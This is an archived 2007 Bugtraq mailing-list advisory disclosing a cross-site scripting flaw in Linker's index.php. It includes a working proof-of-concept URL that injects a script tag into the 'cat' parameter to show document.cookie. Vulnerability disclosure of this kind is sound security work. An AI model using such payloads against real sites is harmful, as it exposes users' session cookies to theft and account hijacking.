Linker index.php - Cross-Site Scripting Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Linker index.php - Cross-Site Scripting Vulnerability
From: "vagrant - e-hack.org" <kernel-32@xxxxxxxxxxx>
Date: Sat, 02 Jun 2007 06:01:20 +0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Linker index.php - Cross-Site Scripting Vulnerability

Vulnerability:http://www.target.com/index.php?cat=3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(document.cookie)%3B%3C/script%3E


Vulnerable: All Versions

Script : http://enproject.codelib.co.kr


----------------------------------------------- >>>

Credits : Vagrant

Contact : kernel-32 (at) hotmail (dot) com [email concealed]

Site : e-hack.org

06.02.2007

_________________________________________________________________

Live Earth'ü MSN aracılığıyla izleme şansına sahipsiniz.http://liveearthsos.msn.com/Hub.aspx?mkt=tr-tr

Prev by Date: jumping sudo using ptrace on Linux/i386
Next by Date: MyEvent1.6 (template.php) Remote File Inclusion Vulnerability
Previous by thread: jumping sudo using ptrace on Linux/i386
Next by thread: MyEvent1.6 (template.php) Remote File Inclusion Vulnerability
Index(es):
- Date
- Thread